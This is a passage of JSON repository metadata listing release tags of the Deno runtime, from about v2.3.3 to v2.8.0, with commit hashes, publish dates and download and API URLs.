lished_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","depen